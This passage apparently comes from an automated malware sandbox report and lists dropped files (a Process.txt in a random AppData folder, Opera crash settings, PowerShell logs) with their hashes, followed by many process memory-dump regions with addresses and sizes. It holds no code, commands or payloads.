                                  817a7c3da97b29c47420d6e16dbaa2caf0a9dff1ac1ada0392e27c1d6758f79f

                                  SHA512

                                  9483cf9d4cc5c59965163ac3eae71687bb65c5776c62dab8a44e39f495b085d2d38e4cbf1bc434677d2ea8218ebb8a3686052259da038b6f0aa02e8ee8640f72

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\NNuRBTJLZJGUMLNLFE.Admin\Process.txt
                                  Filesize

                                  1018B

                                  MD5

                                  78b4ffcf05ae9632f7496cae1e0d5145

                                  SHA1

                                  f96869a61a9168089488a6ceeeb3ee6079a54a1e

                                  SHA256

                                  b03679c91ae9d63eb3a81744128b06cca39948f4cd6e1f16eccaa4d5c9c83b66

                                  SHA512

                                  44b8f416dc0422b884bebc6c549f07f639838e6ab94514600f4a2bee7704924c44060b36cf3efc4e94468bd130422bd49ea78e201a77de083eb697ec65b12b50

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\NNuRBTJLZJGUMLNLFE.Admin\Process.txt
                                  Filesize

                                  1KB

                                  MD5

                                  6e5df98e32d176a1cde9cf3b25554a8f

                                  SHA1

                                  9d580ad221af1490147e15f73372afda69cb8b4e

                                  SHA256

                                  0a5e28add4dcc74be944b246e92e1b2c89a6aa862271bb0f120466bfdaf25e8a

                                  SHA512

                                  bfbe42e082b5deb93523a7a2095749c45f484758696af2fe17297960a2c25c1e77d90a4abf905191c246ac7786ceada06267dee51d7423a720d0d441189a63d1

                                  Download Submit

                                • C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
                                  Filesize

                                  40B

                                  MD5

                                  103b5cb874419791d33cda40fb6cb04f

                                  SHA1

                                  26b769adb9162a6ffc03514b37eb870961777b9f

                                  SHA256

                                  3cddd716026068ba993e82fa1b19ba3f9aff28782eef4e0e67401af47393812f

                                  SHA512

                                  8d50c26bbde8d859aa2716b527a6b87e9953e910cdd705bb48f009d13bfffdcb9fc4bf94558e78320d4219ec3b8735c08262665192a488de3958c5ce03856e41

                                  Download Submit

                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  4KB

                                  MD5

                                  bdb25c22d14ec917e30faf353826c5de

                                  SHA1

                                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                                  SHA256

                                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                                  SHA512

                                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                                  Download Submit

                                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  b42c70c1dbf0d1d477ec86902db9e986

                                  SHA1

                                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                                  SHA256

                                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                                  SHA512

                                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                                  Download Submit

                                • memory/100-272-0x0000000000400000-0x00000000004D8000-memory.dmp

                                  Filesize

                                  864KB

                                  Download

                                • memory/100-58-0x0000000000400000-0x00000000004D8000-memory.dmp

                                  Filesize

                                  864KB

                                  Download

                                • memory/1300-496-0x0000000000400000-0x000000000071C000-memory.dmp

                                  Filesize

                                  3.1MB

                                  Download

                                • memory/1300-271-0x00000000036B0000-0x00000000037F0000-memory.dmp

                                  Filesize

                                  1.2MB

                                  Download

                                • memory/1300-364-0x00000000036B0000-0x00000000037F0000-memory.dmp

                                  Filesize

                                  1.2MB

                                  Download

                                • memory/1300-369-0x0000000000400000-0x000000000071C000-memory.dmp

                                  Filesize

                                  3.1MB

                                  Download

                                • memory/1300-273-0x0000000000400000-0x000000000071C000-memory.dmp

                                  Filesize

                                  3.1MB

                                  Download

                                • memory/1300-294-0x00000000036B0000-0x00000000037F0000-memory.dmp

                                  Filesize

                                  1.2MB

                                  Download

                                • memory/1300-298-0x00000000036B0000-0x00000000037F0000-memory.dmp

                                  Filesize

                                  1.2MB

                                  Download

                                • memory/1300-300-0x0000000000400000-0x000000000071C000-memory.dmp

                                  Filesize

                                  3.1MB

                                  Download

                                • memory/1412-241-0x0000021DF9800000-0x0000021DF9822000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/2100-371-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp

                                  Filesize

                                  8.0MB

                                  Download

                                • memory/2100-513-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp

                                  Filesize

                                  8.0MB

                                  Download

                                • memory/2100-355-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp

                                  Filesize

                                  8.0MB

                                  Download

                                • memory/2100-356-0x0000026684490000-0x00000266844B0000-memory.dmp

                                  Filesize

                                  128KB

                                  Download

                                • memory/2100-372-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp

                                  Filesize

                                  8.0MB

                                  Download

                                • memory/2100-498-0x00007FF6C28F0000-0x00007FF6C30E4000-memory.dmp

                                  Filesize

                                  8.0MB

                                  Download

                                • memory/3028-357-0x00007FF75D540000-0x00007FF75D8D2000-memory.dmp

                                  Filesize

                                  3.6MB

                                  Download

                                • memory/3028-322-0x00007FF75D540000-0x00007FF75D8D2000-memory.dmp

                                  Filesize

                                  3.6MB

                                  Download

                                • memory/3120-56-0x0000000000400000-0x0000000002BF8000-memory.dmp

                                  Filesize

                                  40.0MB

                                  Download

                                • memory/3888-129-0x0000000006390000-0x00000000063B1000-memory.dmp

                                  Filesize

                                  132KB

                                  Download

                                • memory/3888-63-0x00000000001F0000-0x000000000023A000-memory.dmp

                                  Filesize

                                  296KB

                                  Download

                                • memory/3888-115-0x0000000005610000-0x00000000056A2000-memory.dmp

                                  Filesize

                                  584KB

                                  Download

                                • memory/3888-106-0x0000000005470000-0x0000000005502000-memory.dmp

                                  Filesize

                                  584KB

                                  Download

                                • memory/3888-225-0x0000000007540000-0x00000000075B6000-memory.dmp

                                  Filesize

                                  472KB

                                  Download

                                • memory/3888-122-0x0000000005D80000-0x00000000060D4000-memory.dmp

                                  Filesize

                                  3.3MB

                                  Download

                                • memory/3888-121-0x0000000005D10000-0x0000000005D78000-memory.dmp

                                  Filesize

                                  416KB

                                  Download

                                • memory/3888-123-0x0000000005CB0000-0x0000000005CFC000-memory.dmp

                                  Filesize

                                  304KB

                                  Download

                                • memory/3888-117-0x0000000005C70000-0x0000000005C92000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/3888-128-0x00000000063D0000-0x000000000640C000-memory.dmp

                                  Filesize

                                  240KB

                                  Download

                                • memory/3888-133-0x0000000007300000-0x00000000074C2000-memory.dmp

                                  Filesize

                                  1.8MB

                                  Download

                                • memory/3888-116-0x0000000005420000-0x0000000005470000-memory.dmp

                                  Filesize

                                  320KB

                                  Download

                                • memory/3888-137-0x0000000007A80000-0x0000000008024000-memory.dmp

                                  Filesize

                                  5.6MB

                                  Download

                                • memory/3888-224-0x00000000074D0000-0x0000000007536000-memory.dmp

                                  Filesize

                                  408KB

                                  Download

                                • memory/3888-226-0x0000000007130000-0x000000000714E000-memory.dmp

                                  Filesize

                                  120KB

                                  Download

                                • memory/4060-699-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-701-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-689-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-667-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-678-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-687-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-676-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-696-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-672-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-685-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-700-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-706-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-779-0x00007FF6FC220000-0x00007FF6FC230000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-777-0x00007FF6FC220000-0x00007FF6FC230000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-771-0x00007FF748EB0000-0x00007FF748EC0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-750-0x00007FF748EB0000-0x00007FF748EC0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-746-0x00007FF731F90000-0x00007FF731FA0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-744-0x00007FF7262C0000-0x00007FF7262D0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-737-0x00007FF7228C0000-0x00007FF7228D0000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-736-0x00007FF741140000-0x00007FF741150000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-734-0x00007FF741140000-0x00007FF741150000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-724-0x00007FF741140000-0x00007FF741150000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-722-0x00007FF741140000-0x00007FF741150000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-704-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-702-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-690-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-668-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-698-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-697-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-705-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-703-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-669-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-683-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-670-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-681-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4060-675-0x00007FF709620000-0x00007FF709630000-memory.dmp

                                  Filesize

                                  64KB

                                  Download

                                • memory/4636-512-0x00007FF77B450000-0x00007FF77B466000-memory.dmp

                                  Filesize

                                  88KB

                                  Download

                                • memory/4636-370-0x00007FF77B450000-0x00007FF77B466000-memory.dmp

                                  Filesize

                                  88KB

                                  Download

                                • memory/4724-323-0x000002914E520000-0x000002914E53C000-memory.dmp

                                  Filesize

                                  112KB

                                  Download

                                • memory/4724-319-0x000002914E2D0000-0x000002914E2EC000-memory.dmp

                                  Filesize

                                  112KB

                                  Download

                                • memory/4724-321-0x000002914E3B0000-0x000002914E3BA000-memory.dmp

                                  Filesize

                                  40KB

                                  Download

                                • memory/4724-324-0x000002914E500000-0x000002914E50A000-memory.dmp

                                  Filesize

                                  40KB

                                  Download

                                • memory/4724-325-0x000002914E560000-0x000002914E57A000-memory.dmp

                                  Filesize

                                  104KB

                                  Download

                                • memory/4724-326-0x000002914E510000-0x000002914E518000-memory.dmp

                                  Filesize

                                  32KB

                                  Download

                                • memory/4724-327-0x000002914E540000-0x000002914E546000-memory.dmp

                                  Filesize

                                  24KB

                                  Download

                                • memory/4724-320-0x000002914E2F0000-0x000002914E3A5000-memory.dmp

                                  Filesize

                                  724KB

                                  Download

                                • memory/4724-328-0x000002914E550000-0x000002914E55A000-memory.dmp

                                  Filesize

                                  40KB

                                  Download

                                • memory/4804-277-0x00007FF7B0DC0000-0x00007FF7B1152000-memory.dmp

                                  Filesize

                                  3.6MB

                                  Download

                                • memory/4804-238-0x00007FF7B0DC0000-0x00007FF7B1152000-memory.dmp

                                  Filesize

                                  3.6MB

                                  Download